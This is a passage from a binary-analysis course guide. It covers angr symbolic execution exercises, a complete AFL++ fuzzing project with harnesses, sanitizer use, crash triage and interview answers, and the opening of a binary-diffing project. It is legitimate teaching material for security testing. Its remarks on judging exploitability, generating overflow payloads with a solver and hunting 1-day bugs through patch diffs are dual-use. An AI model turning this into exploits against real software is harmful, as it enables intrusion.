    • Consider: output strings, register values, success indicators
  3. Whatโ€™s your strategy for dealing with loops in symbolic execution?
    • Hook and skip them? Bound the iteration count? Use loop summarization?
    • When is it safe to unroll a loop symbolically?
  4. How do you handle programs that read from files or network?
    • Model file contents as symbolic variables
    • Create SimFiles with symbolic or concrete content
    • What if the file size itself affects control flow?
  5. When should you use hooks vs. letting angr execute the real code?
    • Hook when: function is complex (encryption), irrelevant (logging), or environment-dependent (network)
    • Donโ€™t hook when: function contains target logic, or you need exact behavior
  6. How do you extract useful information from an โ€œavoidedโ€ state?
    • Sometimes you want to know why a path was avoided (e.g., failed authentication)
    • Can you extract constraints from avoided states to understand preconditions?
  7. How would you use angr to find buffer overflow vulnerabilities?
    • Create symbolic buffer, look for states where return address is symbolic
    • Check if constraints allow attacker-controlled values in RIP/EIP
  8. Whatโ€™s the difference between angr and a fuzzer like AFL++?
    • angr: deterministic, finds exact inputs, but slow and suffers path explosion
    • AFL++: probabilistic, fast, but might miss rare conditions
    • When would you use one over the other?

Thinking Exercise

Exercise 1: Understanding Symbolic Constraints

Consider this simple program:

int check_password(char *input) {
    if (input[0] == 'P' && input[1] == 'W' && input[2] - input[3] == 5) {
        return 1;  // Success
    }
    return 0;  // Fail
}

If input is symbolic, answer:

  1. What constraint is added after the first comparison (input[0] == 'P')?
  2. What are ALL the constraints accumulated by the time we reach return 1?
  3. Give one concrete input that satisfies these constraints (besides โ€œPWโ€ฆโ€).
  4. How many possible concrete inputs exist? (Hint: think about input[2] and input[3])

Exercise 2: Path Explosion Calculation

Consider this code:

for (int i = 0; i < N; i++) {
    if (input[i] == 'A') {
        process_A();
    } else {
        process_B();
    }
}

Questions:

  1. How many paths exist for N=5?
  2. How many paths for N=20?
  3. If each state takes 1 second to solve, how long for N=30?
  4. What techniques could angr use to reduce this explosion?

Exercise 3: Writing a Find Condition

Youโ€™re analyzing a crackme that prints either โ€œCorrect password!โ€ or โ€œTry again.โ€ to stdout. Write the angr find and avoid conditions:

simgr.explore(
    find=???,
    avoid=???
)

Consider:

  • Should you search for output strings? Address? Register values?
  • What if the program prints both messages under different conditions?
  • How do you avoid false positives?

Exercise 4: Designing a Hook

The target program calls strlen(user_input) and you want to hook it for performance:

@proj.hook(strlen_address)
def strlen_hook(state):
    # Your implementation here
    pass

Questions:

  1. How do you get the string pointer from the function argument?
  2. How do you calculate symbolic string length?
  3. What do you return and where do you put it?
  4. What edge cases might break your hook?

Exercise 5: Debugging Symbolic Execution

You run angr on a crackme and it explores 10,000 states in 5 minutes without finding a solution. What do you check?

  1. Is path explosion happening? (Check active/deadended states count)
  2. Is the find condition correct? (Print state info when states reach suspected area)
  3. Are you starting from the right place?
  4. Should you add hooks to skip expensive functions?
  5. Are there loops that need bounding?

Write a debugging checklist for troubleshooting angr scripts.

The Interview Questions Theyโ€™ll Ask

  1. โ€œExplain symbolic execution to someone who only knows basic programming.โ€
    • Expected Answer: โ€œInstead of running a program with one specific input like โ€˜helloโ€™, symbolic execution runs it with a placeholder โ€˜Xโ€™ that represents ANY possible input. As the program runs, it tracks rules like โ€˜if X[0] == โ€˜hโ€™ then take this branch, else take that branchโ€™. At the end, it uses a math solver to find what X should be to reach a specific goal, like printing โ€˜successโ€™.โ€
  2. โ€œWhatโ€™s the path explosion problem and how do you mitigate it?โ€
    • Expected Answer: Each branch doubles possible paths (2โฟ growth). Loops amplify this massively. Mitigations: (1) Bound loop iterations. (2) Use avoid to prune uninteresting paths. (3) Path merging (veritesting). (4) Start execution closer to target. (5) Hook complex functions. (6) Use exploration strategies like DFS or prioritized search. (7) Set state limits and timeouts.
  3. โ€œWhen would you use symbolic execution instead of fuzzing?โ€
    • Expected Answer: Use symbolic execution when: (1) You need to find exact input for rare condition (e.g., exact password, magic number). (2) Path requires multiple constraints (fuzzing unlikely to hit). (3) You need proof input exists vs. probabilistic search. Use fuzzing when: (1) Fast results needed. (2) Program is large (path explosion). (3) Target is common bugs (crashes) not specific paths.
  4. โ€œHow does angr use Z3 solver?โ€
    • Expected Answer: angr accumulates constraints as path conditions (e.g., x[0] == 'P' AND x[1] == 'W' AND x[2] > 100). When you ask for a solution, angr converts these to Z3โ€™s bitvector logic and asks โ€œis this satisfiable?โ€ Z3 uses SMT solving algorithms to either find values that satisfy all constraints, or prove none exist.
  5. โ€œYouโ€™re symbolically executing a program and angr hangs. What do you do?โ€
    • Expected Answer: (1) Check state counts - are active states growing infinitely? (2) Look for unbounded loops in source/assembly. (3) Enable debug logging to see where itโ€™s stuck. (4) Try different exploration strategy (DFS vs BFS). (5) Add hooks to skip expensive functions. (6) Set state limits (max_states parameter). (7) Check if solver is the bottleneck (complex constraints). (8) Start execution closer to target to reduce state space.
  6. โ€œWhatโ€™s the difference between angrโ€™s static CFG and dynamic CFG?โ€
    • Expected Answer: Static CFG (CFGFast): analyzes binary without execution, fast, incomplete (misses computed jumps, self-modifying code). Uses pattern matching for function prologue/epilogue. Dynamic CFG (CFGEmulated): traces execution symbolically, slower, more accurate, finds code through actual control flow. Use static for quick overview, dynamic for precision.
  7. โ€œHow would you use angr to find a buffer overflow?โ€
    • Expected Answer: (1) Create symbolic buffer as input. (2) Track stack pointer and return address. (3) Look for states where return address contains symbolic bits (means we control it). (4) Check if constraints allow attacker values (not just symbolic). (5) Use solver to generate overflow payload. (6) Alternatively: look for states where rip/eip is symbolic, or where invalid memory access occurs.
  8. โ€œExplain what happens when you hit a symbolic jump target (jmp [symbolic_address]).โ€
    • Expected Answer: angr canโ€™t symbolically execute jump to unknown location. It must concretize: choose a concrete value for the address. Strategies: (1) Try all possible values (forks states - explosion!). (2) Use concretization strategy (max, min, or random value). (3) Constrain address to valid code region. (4) This can cause path loss if you concretize to wrong value. Ideally, constrain jump target based on prior analysis.
  9. โ€œHow do angr hooks (SimProcedures) work and when should you use them?โ€
    • Expected Answer: Hooks replace function execution with Python code. When PC reaches hooked address, angr calls Python instead of executing instructions. Use when: (1) Function is expensive (crypto). (2) Environment interaction (file I/O, network). (3) Known behavior (strlen, memcpy) - summarize rather than execute. How: Read arguments from state.regs/memory, compute result, write to return value, adjust stack/PC. Example: hook strcmp to just compare symbolic strings symbolically without executing assembly.
  10. โ€œWhatโ€™s veritesting and why is it useful?โ€
    • Expected Answer: Veritesting merges multiple execution paths into a single state using conditional expressions. Instead of forking at each branch (exponential states), it creates merged state: result = if(cond) then A else B. Dramatically reduces path explosion for straight-line code with many branches. Most useful for code with many conditionals but few loops. Enabled with simgr.use_technique(angr.exploration_techniques.Veritesting()).

Books That Will Help

Topic Book Chapter/Section Why It Matters
Symbolic Execution Fundamentals โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch. 11.4: Symbolic Execution Introduction to symbolic execution concepts
Binary Analysis Foundation โ€œPractical Binary Analysisโ€ Ch. 6: Disassembly and Binary Analysis Fundamentals Understand what angr is analyzing
Dynamic Binary Instrumentation โ€œPractical Binary Analysisโ€ Ch. 11: Principles of Dynamic Binary Instrumentation Related techniques (Pin, DynamoRIO)
Control Flow Graph Recovery โ€œPractical Binary Analysisโ€ Ch. 6.3: Control Flow Graphs How angr discovers program structure
Assembly and Instruction Sets โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch. 3-5: Assembly Language Understanding what VEX IR represents
Computer Architecture โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3: Machine-Level Representation Foundation for understanding execution
Integer Representations โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 2: Representing and Manipulating Information Understand bitvector logic in Z3
Memory and Addressing โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 9: Virtual Memory How angr models memory
Optimization Techniques โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 5: Optimizing Program Performance Understanding why some code paths are expensive
Linking and Loading โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7: Linking How angr loads binaries
Dynamic Analysis โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch. 3: Basic Dynamic Analysis Complementary dynamic analysis techniques
Control Flow Analysis โ€œPractical Malware Analysisโ€ Ch. 4: A Crash Course in x86 Disassembly Reading assembly to understand paths
Anti-Analysis Bypass โ€œPractical Malware Analysisโ€ Ch. 16: Anti-Debugging Using angr to bypass protections
Constraint Solving Basics Z3 Tutorial Documentation Entire tutorial Understanding the solver angr uses
Academic Foundation Academic Paper: โ€œA Survey of Symbolic Execution Techniquesโ€ (Baldoni et al., 2018) Full paper Deep dive into symbolic execution research
Veritesting Technique Paper: โ€œEnhancing Symbolic Execution with Veritestingโ€ (Avgerinos et al., 2014) Full paper Advanced technique for path merging
angr Framework angr Official Documentation Core Concepts, Examples, Advanced Topics Comprehensive guide to angr usage

Project 12: Fuzzing with AFL++

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (for harnesses), Shell
  • Alternative Programming Languages: Python (for orchestration)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The โ€œService & Supportโ€ Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Vulnerability Discovery / Fuzzing
  • Software or Tool: AFL++, libFuzzer, Address Sanitizer
  • Main Book: โ€œThe Fuzzing Bookโ€ (online)

What youโ€™ll build: Fuzzing campaigns that automatically discover crashes and vulnerabilities in binary programs.

Why it teaches binary analysis: Fuzzing is how most modern vulnerabilities are found. Understanding fuzzing means understanding what makes programs crash.

Core challenges youโ€™ll face:

  • Writing harnesses โ†’ maps to calling the target function
  • Preparing corpus โ†’ maps to good starting inputs
  • Triaging crashes โ†’ maps to which crashes are exploitable?
  • Binary-only fuzzing โ†’ maps to QEMU mode, Frida

Resources for key challenges:

Key Concepts:

  • Coverage-Guided Fuzzing: AFL++ docs
  • Sanitizers: LLVM sanitizer docs
  • Persistent Mode: AFL++ performance docs

Difficulty: Advanced Time estimate: 2-3 weeks Prerequisites: C programming, Projects 1-3

Real world outcome:

# Compile target with instrumentation
$ afl-gcc -o target target.c

# Prepare input corpus
$ mkdir in out
$ echo "test" > in/seed1

# Start fuzzing
$ afl-fuzz -i in -o out ./target @@

# AFL++ output:
#        american fuzzy lop ++4.00c
# โ”Œโ”€ process timing โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
# โ”‚        run time : 0 days, 0 hrs, 23 min, 45 sec      โ”‚
# โ”‚   last new find : 0 days, 0 hrs, 0 min, 12 sec       โ”‚
# โ”œโ”€ overall results โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
# โ”‚  cycles done : 847                                   โ”‚
# โ”‚ corpus count : 234                                   โ”‚
# โ”‚saved crashes : 3 (!)                                 โ”‚   โ† Found bugs!
# โ”‚  saved hangs : 0                                     โ”‚
# โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

# Triage crashes
$ for crash in out/crashes/*; do
    ./target "$crash" 2>&1 | head -5
done

Implementation Hints:

Writing a harness:

// For AFL++
int main(int argc, char **argv) {
    if (argc < 2) return 1;

    FILE *f = fopen(argv[1], "r");
    if (!f) return 1;

    char buf[1024];
    size_t len = fread(buf, 1, sizeof(buf), f);
    fclose(f);

    // Call the function we want to fuzz
    parse_input(buf, len);
    return 0;
}

// For libFuzzer
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    parse_input((char*)data, size);
    return 0;
}

AFL++ modes:

  • Source mode: Compile with afl-gcc/afl-clang-fast
  • QEMU mode: Fuzz binaries without source (-Q flag)
  • Frida mode: Alternative for binary-only
  • Persistent mode: Faster fuzzing with loop

Sanitizers (compile with these for better crash detection):

# Address Sanitizer (memory bugs)
clang -fsanitize=address,fuzzer target.c

# Undefined Behavior Sanitizer
clang -fsanitize=undefined,fuzzer target.c

Learning milestones:

  1. Fuzz simple target โ†’ Find obvious crashes
  2. Write custom harness โ†’ Fuzz specific functions
  3. Triage crashes โ†’ Determine exploitability
  4. Fuzz binary-only โ†’ No source code available

The Core Question Youโ€™re Answering

โ€œHow do we automatically generate millions of test inputs to stress-test software and uncover crashes, memory corruption, and security vulnerabilitiesโ€”faster than any human could manually test?โ€

This project introduces coverage-guided fuzzing, a technique that uses code coverage feedback to intelligently generate inputs that explore new execution paths. Youโ€™ll learn how fuzzers like AFL++ combine random mutation with evolutionary algorithms to find bugs that have eluded traditional testing for years.

Concepts You Must Understand First

  1. Coverage-Guided Fuzzing vs. Dumb Fuzzing
    • Dumb fuzzing: random inputs, no feedback (fast but inefficient)
    • Coverage-guided: monitors code coverage, prioritizes inputs that reach new code
    • Evolutionary algorithm: โ€œinterestingโ€ inputs mutated to find more code

    Guiding Questions:

    • Why does code coverage feedback make fuzzing 10-100x more effective?
    • Whatโ€™s the difference between edge coverage and block coverage?
    • How does AFL++ track which inputs discovered new paths?

    Book References:

    • โ€œThe Fuzzing Bookโ€ (online) - Chapter: Coverage-Based Fuzzing
    • โ€œFuzzing: Brute Force Vulnerability Discoveryโ€ by Sutton, Greene, Amini - Chapter 4: Feedback-Driven Fuzzing
  2. Code Instrumentation and Compile-Time Hooking
    • How afl-gcc/afl-clang inject coverage tracking code into binaries
    • Shared memory bitmap: fast communication between target and fuzzer
    • Hash collisions and edge coverage vs. exact hit count

    Guiding Questions:

    • What assembly instructions does AFL++ insert at each basic block?
    • Why use shared memory instead of file I/O for coverage feedback?
    • What happens when two different edges hash to the same bitmap index?

    Book References:

    • AFL++ Technical Whitepaper
    • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 11: Dynamic Binary Instrumentation (similar techniques)
  3. Genetic Algorithms in Fuzzing
    • Mutation strategies: bit flips, byte replacements, arithmetic operations
    • Crossover/splicing: combining parts of two interesting inputs
    • Fitness function: how โ€œinterestingโ€ is this input? (new coverage? speed?)

    Guiding Questions:

    • Why does AFL++ keep a queue of โ€œinterestingโ€ inputs instead of just one?
    • How does deterministic mutation differ from havoc mutation?
    • What makes an input worth saving to the corpus?

    Book References:

    • โ€œThe Fuzzing Bookโ€ - Chapter: Mutation-Based Fuzzing
    • โ€œThe Fuzzing Bookโ€ - Chapter: Grammar-Based Fuzzing (advanced: structured inputs)
  4. Sanitizers (ASan, UBSan, MSan)
    • AddressSanitizer (ASan): detects buffer overflows, use-after-free
    • UndefinedBehaviorSanitizer (UBSan): catches signed integer overflow, null deref
    • MemorySanitizer (MSan): finds uninitialized memory reads

    Guiding Questions:

    • Why doesnโ€™t a buffer overflow always cause an immediate crash?
    • How does ASan detect a 1-byte overflow that doesnโ€™t corrupt anything critical?
    • Whatโ€™s the performance cost of running with sanitizers?

    Book References:

    • LLVM Sanitizer Documentation
    • โ€œThe Fuzzing Bookโ€ - Chapter: Fuzzing with Grammars (discusses sanitizers)
    • Google AddressSanitizer Wiki
  5. Harness Design
    • Isolating the target function from I/O, state, and external dependencies
    • Persistent mode: fuzz in-process loop (1000x faster than fork-exec)
    • Shared memory fuzzing: even faster communication

    Guiding Questions:

    • Why is fork-exec fuzzing slower than persistent mode?
    • What state needs to be reset between iterations in persistent mode?
    • When would you NOT use persistent mode?

    Book References:

    • AFL++ Documentation - Persistent Mode
    • โ€œThe Fuzzing Bookโ€ - Chapter: Fuzzing APIs
  6. Corpus Distillation and Minimization
    • Corpus: collection of โ€œinterestingโ€ inputs that trigger unique paths
    • Minimization: reducing input size while preserving path coverage
    • Why smaller inputs = faster fuzzing

    Guiding Questions:

    • Why does AFL++ automatically minimize crash inputs?
    • How can you merge multiple fuzzer output directories?
    • Whatโ€™s the trade-off between corpus size and fuzzing speed?

    Book References:

    • AFL++ Documentation - Corpus Management
    • โ€œThe Fuzzing Bookโ€ - Chapter: Reducing Failure-Inducing Inputs
  7. Binary-Only Fuzzing (QEMU Mode)
    • When source code isnโ€™t available (proprietary software, firmware)
    • QEMU user-mode emulation: CPU-level instrumentation
    • Performance cost: 2-5x slower than source-based fuzzing

    Guiding Questions:

    • How does AFL++ instrument a binary without recompiling?
    • Why is QEMU mode slower than compile-time instrumentation?
    • When would you use Frida mode instead of QEMU mode?

    Book References:

    • AFL++ Documentation - Binary-Only Fuzzing
    • QEMU User Mode Documentation
  8. Crash Triage and Exploitability
    • Not all crashes are exploitable (assertion failures, null deref in safe context)
    • Stack traces, registers, and memory dumps to understand root cause
    • Exploitability scoring: can an attacker control RIP/EIP?

    Guiding Questions:

    • Whatโ€™s the difference between a DoS crash and RCE crash?
    • How do you deduplicate crashes (same bug, different inputs)?
    • What makes a heap overflow more exploitable than a stack overflow?

    Book References:

    • โ€œThe Fuzzing Bookโ€ - Chapter: Debugging and Fixing Bugs
    • โ€œPractical Malware Analysisโ€ by Sikorski & Honig - Chapter 7: Analyzing Malicious Windows Programs (crash analysis)
    • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Chapter 0x300: Exploitation (exploitability)
  9. Fuzzing State Machines and Protocols
    • Stateful fuzzing: multiple requests in sequence (login โ†’ action โ†’ logout)
    • Protocol fuzzing: maintaining valid structure while mutating fields
    • Grammar-based fuzzing for structured inputs (JSON, XML, network protocols)

    Guiding Questions:

    • How do you fuzz a server that requires authentication?
    • Why is completely random data ineffective for JSON parsing?
    • How do you maintain protocol structure while still finding bugs?

    Book References:

    • โ€œThe Fuzzing Bookโ€ - Chapter: Fuzzing APIs
    • โ€œThe Fuzzing Bookโ€ - Chapter: Grammars and Parse Trees
    • โ€œFuzzing: Brute Force Vulnerability Discoveryโ€ - Chapter 11: Protocol Fuzzing
  10. Parallelization and Distributed Fuzzing
    • Running multiple fuzzer instances for better coverage
    • Master/slave architecture: instances share discoveries
    • Syncing corpus between fuzzers

    Guiding Questions:

    • Why does running 10 fuzzers give you more than 10x throughput?
    • How do AFL++ instances communicate discovered paths?
    • Whatโ€™s the optimal number of fuzzer instances for your CPU cores?

    Book References:

    • AFL++ Documentation - Parallelization
    • โ€œThe Fuzzing Bookโ€ - Chapter: Fuzzing with Grammars (scaling)

Questions to Guide Your Design

  1. How do you design a good seed corpus for your target?
    • Should seeds be minimal? Diverse? Cover all features?
    • Where do you get seeds? (valid test files, documentation examples, web scraping)
    • How many seeds is optimal? (1? 100? 10,000?)
  2. Whatโ€™s your strategy for persistent mode harness design?
    • What state needs reset (globals, heap, file descriptors)?
    • How do you handle memory leaks in persistent mode?
    • When does cumulative state pollution become a problem?
  3. How do you prioritize which crashes to investigate first?
    • Stack smashing vs. heap corruption vs. null deref
    • Unique crash traces vs. duplicates
    • Consider: exploitability, severity, ease of fix
  4. When should you use AFL++ vs. libFuzzer?
    • AFL++: standalone binaries, fork-exec model, binary-only support
    • libFuzzer: in-process fuzzing, better for libraries/APIs, faster
    • Which for: file parser? Network server? Library function?
  5. How do you fuzz a program that requires specific input structure?
    • Use AFL++โ€™s custom mutators? Grammar-based fuzzer?
    • Pre-process inputs to fix checksums/lengths?
    • Or just let fuzzer learn structure through feedback?
  6. What metrics tell you fuzzing is โ€œdoneโ€ or needs a different approach?
    • No new paths in N hours?
    • Diminishing returns on exec/sec?
    • Coverage plateau?
  7. How would you fuzz a network server with AFL++?
    • Harness that reads from file and sends to socket?
    • Preeny/AFL++โ€™s network mode?
    • Consider: connection handling, state, timeouts
  8. Whatโ€™s your approach for triaging hundreds of crash files?
    • Automated deduplication (stack hash, crash hash)
    • Minimization to reduce noise
    • Scripted triage: GDB automation, register dumps
    • Prioritization based on exploitability signals

Thinking Exercise

Exercise 1: Understanding Coverage Feedback

Consider this simple function:

void parse(char *input) {
    if (input[0] == 'A') {
        if (input[1] == 'B') {
            if (input[2] == 'C') {
                crash();  // Bug!
            }
        }
    }
}

Questions:

  1. Starting with seed โ€œXXXโ€, what mutations will AFL++ try?
  2. How many generations to reach โ€œABCโ€ (on average)?
  3. Why would dumb fuzzing (pure random) take millions of tries?
  4. Draw the coverage map evolution as AFL++ discovers A, AB, ABC.

Exercise 2: Designing a Harness

You need to fuzz this library function:

int process_image(uint8_t *data, size_t len) {
    // Parses image header, processes pixels
    // Maintains internal state in global variables
    return 0;
}

Tasks:

  1. Write an AFL++ harness (file-based).
  2. Convert to persistent mode harness.
  3. What global state needs resetting?
  4. How do you handle if process_image crashes?

Exercise 3: Crash Triage

AFL++ found a crash with this input: AAAAAAAAAAAAAAAAAAAAAAAAAAAA... (100 Aโ€™s)

GDB shows:

Program received signal SIGSEGV, Segmentation fault.
0x00000000004141414141 in ?? ()

Questions:

  1. What type of vulnerability is this?
  2. Is it likely exploitable? Why?
  3. What register likely contains 0x4141414141414141?
  4. How would you confirm this is a buffer overflow vs. use-after-free?
  5. Whatโ€™s the next step: minimize input, write exploit, or file bug report?

Exercise 4: Optimizing Fuzzing Performance

Your fuzzer shows these stats:

exec speed: 150/sec
corpus count: 4500
last new path: 6 hours ago
stability: 95%

Questions:

  1. Is 150 exec/sec good or bad? (Depends on target complexity)
  2. What does low stability (95%) indicate?
  3. What would you try to increase exec/sec?
  4. When should you stop fuzzing this campaign?

Exercise 5: Sanitizer Output Analysis

ASan reports:

==1234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000018
READ of size 4 at 0x602000000018
    #0 0x4005a3 in parse_header /src/parser.c:45
    #1 0x4006f2 in main /src/main.c:12

0x602000000018 is located 0 bytes to the right of 24-byte region
allocated by:
    #0 0x7f8b2e in malloc
    #1 0x4005f3 in parse_header /src/parser.c:42

Interpret this:

  1. What line contains the bug?
  2. What was the allocation size?
  3. How many bytes did the read overflow by?
  4. Is this a write or read overflow? (Check severity)
  5. What fix would you apply?

The Interview Questions Theyโ€™ll Ask

  1. โ€œExplain how AFL++โ€™s coverage-guided fuzzing works.โ€
    • Expected Answer: AFL++ instruments the binary to track which edges (basic block transitions) are hit. It maintains a bitmap of discovered edges. For each input, it checks if new edges are hit. If yes, the input is โ€œinterestingโ€ and saved to corpus for mutation. AFL++ mutates interesting inputs (bit flips, arithmetic, splicing) and repeats. Over time, it evolves inputs that explore deeper into the program, finding crashes in rare paths.
  2. โ€œWhatโ€™s the difference between afl-gcc, afl-clang-fast, and afl-qemu?โ€
    • Expected Answer: afl-gcc: compile-time instrumentation via GCC plugin, slower compilation. afl-clang-fast: uses LLVM passes for instrumentation, faster and better optimization. afl-qemu: binary-only fuzzing via CPU emulation, no source needed but 2-5x slower. Use clang-fast when you have source, QEMU when you donโ€™t.
  3. โ€œWhy is persistent mode faster than fork-exec mode?โ€
    • Expected Answer: Fork-exec mode spawns a new process for every input (high overhead: process creation, loading binary, linking libraries). Persistent mode runs target in a loop within same processโ€”just one fork, then thousands of iterations. Can achieve 1000x speedup. Trade-off: must ensure state is reset between iterations to avoid cumulative bugs.
  4. โ€œWhatโ€™s AddressSanitizer and why use it with AFL++?โ€
    • Expected Answer: ASan is a compiler instrumentation that detects memory errors (buffer overflows, use-after-free, double-free). It adds โ€œred zonesโ€ around allocations and checks every memory access. With AFL++, ASan catches subtle bugs that donโ€™t immediately crashโ€”turning silent corruption into loud crashes. Performance cost: 2x slowdown, but worth it for bug detection.
  5. โ€œYouโ€™ve been fuzzing for 24 hours with no new paths. What do you do?โ€
    • Expected Answer: (1) Check coverageโ€”have you plateaued at low coverage? (2) Improve seed corpusโ€”add diverse valid inputs. (3) Try custom mutator for structured data. (4) Use dictionary for magic bytes/keywords. (5) Try grammar-based fuzzing for complex formats. (6) Check if target is doing input validation that rejects most mutations. (7) Consider if youโ€™ve found all easy bugsโ€”might need symbolic execution or manual analysis for deeper bugs.
  6. โ€œHow do you triage 500 crash files from a fuzzing campaign?โ€
    • Expected Answer: (1) Deduplicate: Use AFL++โ€™s afl-cmin or crash hash (stack trace hash) to group duplicates. (2) Minimize: Use afl-tmin to reduce crash inputs to minimal size. (3) Exploitability: Prioritize based on crash type (RIP control > heap overflow > null deref). (4) Automate: Script GDB to dump registers/backtrace for each unique crash. (5) Categorize: File bugs by root cause. (6) Fix: Start with most severe/exploitable.
  7. โ€œWhatโ€™s the difference between edge coverage and block coverage?โ€
    • Expected Answer: Block coverage: which basic blocks executed (e.g., blocks A, B, C). Edge coverage: which transitions between blocks (Aโ†’B, Bโ†’C). Edge coverage is more preciseโ€”same blocks can be hit via different paths. Example: if(x) {A();} else {B();} C(); has edges (startโ†’Aโ†’C) and (startโ†’Bโ†’C). AFL++ uses edge coverage to discover these different paths.
  8. โ€œHow would you fuzz a closed-source binary?โ€
    • Expected Answer: Use AFL++โ€™s QEMU mode (-Q flag) or Frida mode. QEMU emulates the binary and instruments at CPU instruction level. Slower than source-based but works without source. Steps: (1) afl-fuzz -Q -i in -o out ./binary @@. (2) Ensure binary isnโ€™t stripped (or use -Q -m none). (3) May need to adjust timeouts for slower execution. (4) Alternative: use Intel PT for hardware-based tracing (faster than QEMU).
  9. โ€œExplain the concept of a โ€˜deterministicโ€™ vs. โ€˜havocโ€™ stage in AFL++.โ€
    • Expected Answer: Deterministic: AFL++ tries systematic mutationsโ€”every bit flip, byte flip, arithmetic operations at every position. Thorough but slow. Havoc: random chaotic mutationsโ€”multiple random changes per input, stacked mutations, splicing. Fast exploration. AFL++ does deterministic first for new inputs, then switches to havoc. Deterministic finds โ€œobviousโ€ bugs, havoc finds complex multi-condition bugs.
  10. โ€œYou found a crash but the minimized input is still 10KB. Why might minimization fail to shrink it further?โ€
    • Expected Answer: (1) Bug requires multiple conditions spread across input. (2) Checksum/length field must matchโ€”removing bytes breaks validity. (3) Complex state machineโ€”need valid sequence to reach crash. (4) Minimizerโ€™s algorithm limitation (greedy approach can get stuck). Solutions: (1) Manual analysis to understand trigger. (2) Use structure-aware minimization. (3) Binary search on input chunks. (4) Check if crash is stableโ€”does it reproduce consistently?

Books That Will Help

Topic Book Chapter/Section Why It Matters
Fuzzing Fundamentals โ€œThe Fuzzing Bookโ€ by Andreas Zeller et al. (online) Chapter: Coverage-Based Fuzzing Comprehensive introduction to fuzzing concepts
Mutation Strategies โ€œThe Fuzzing Bookโ€ Chapter: Mutation-Based Fuzzing How fuzzers generate new inputs
Grammar-Based Fuzzing โ€œThe Fuzzing Bookโ€ Chapter: Fuzzing with Grammars Structured input fuzzing (JSON, XML)
Reducing Inputs โ€œThe Fuzzing Bookโ€ Chapter: Reducing Failure-Inducing Inputs Input minimization techniques
Professional Fuzzing โ€œFuzzing: Brute Force Vulnerability Discoveryโ€ by Sutton, Greene, Amini Ch. 4: Feedback-Driven Fuzzing Industry perspective on fuzzing
Protocol Fuzzing โ€œFuzzing: Brute Force Vulnerability Discoveryโ€ Ch. 11: Network Protocol Fuzzing Fuzzing stateful systems
Binary Instrumentation โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch. 11: Dynamic Binary Instrumentation How instrumentation works (Pin, DynamoRIO, similar to AFL++)
Memory Corruption โ€œHacking: The Art of Exploitationโ€ by Jon Erickson Ch. 0x300: Exploitation Understanding crashes fuzzers find
Buffer Overflows โ€œHacking: The Art of Exploitationโ€ Ch. 0x350: Buffer Overflows What makes crashes exploitable
Shellcode and Payloads โ€œHacking: The Art of Exploitationโ€ Ch. 0x500: Shellcode Exploitation after finding crash
Heap Exploitation โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch. 9.9: Dynamic Memory Allocation Understanding heap bugs fuzzers find
Memory Safety โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 9.11: Common Memory-Related Bugs Types of vulnerabilities fuzzing discovers
Program Optimization โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 5: Optimizing Program Performance Understanding fuzzer performance
Crash Analysis โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch. 9: OllyDbg (debugging crashes) Triaging fuzzer-discovered crashes
GDB for Triage โ€œThe Art of Debugging with GDB, DDD, and Eclipseโ€ by Matloff & Salzman Entire book Automating crash analysis
Sanitizers Google AddressSanitizer Documentation All sections Using ASan/MSan/UBSan with fuzzers
LLVM Sanitizers LLVM Sanitizer Documentation All sections Understanding sanitizer output
AFL++ Technical Details AFL++ Official Documentation All sections Comprehensive AFL++ usage guide
Parallel Fuzzing AFL++ Documentation Parallelization section Scaling fuzzing campaigns
QEMU Internals QEMU User Mode Documentation Technical documentation Understanding binary-only fuzzing
Libfuzzer libFuzzer Tutorial by Google Full tutorial Alternative in-process fuzzing

Project 13: Binary Diffing

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Ghidra scripts
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The โ€œMicro-SaaS / Pro Toolโ€
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Patch Analysis / Vulnerability Research
  • Software or Tool: BinDiff, Diaphora, Ghidriff
  • Main Book: N/A (tool documentation)

What youโ€™ll build: Compare two versions of a binary to find what changed, useful for understanding patches and finding 1-day vulnerabilities.

Why it teaches binary analysis: Comparing old and new versions reveals exactly what was fixed, helping you understand vulnerabilities.

Core challenges youโ€™ll face:

  • Function matching โ†’ maps to identifying same function across versions
  • Diffing algorithms โ†’ maps to graph-based comparison
